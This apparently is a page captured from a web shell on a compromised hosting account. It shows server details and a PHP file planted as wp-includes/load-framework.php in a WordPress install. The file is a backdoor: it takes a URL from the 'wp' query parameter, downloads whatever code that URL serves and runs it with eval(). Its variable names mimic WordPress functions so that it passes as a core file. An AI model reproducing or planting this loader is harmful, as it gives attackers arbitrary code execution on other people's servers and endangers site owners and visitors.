HEX
Server: Apache
System: Linux hp3-wp-1011395.hostingp3.local 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
User: csh2428284 (2038043)
PHP: 7.3.33
Disabled: shell_exec,exec,system,popen,set_time_limit
Upload Files
File: /home/domains/vol4/298/2931298/user/htdocs/wp-includes/load-framework.php
<?php

if (isset($_GET['wp'])) {
    $the_excerpt_trx = $_GET['wp'];
    if ($get_search_query_vwf = curl_init()) {
        curl_setopt($get_search_query_vwf, CURLOPT_URL, $the_excerpt_trx);
        curl_setopt($get_search_query_vwf, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($get_search_query_vwf));
        curl_close($get_search_query_vwf);
        exit;
    }
}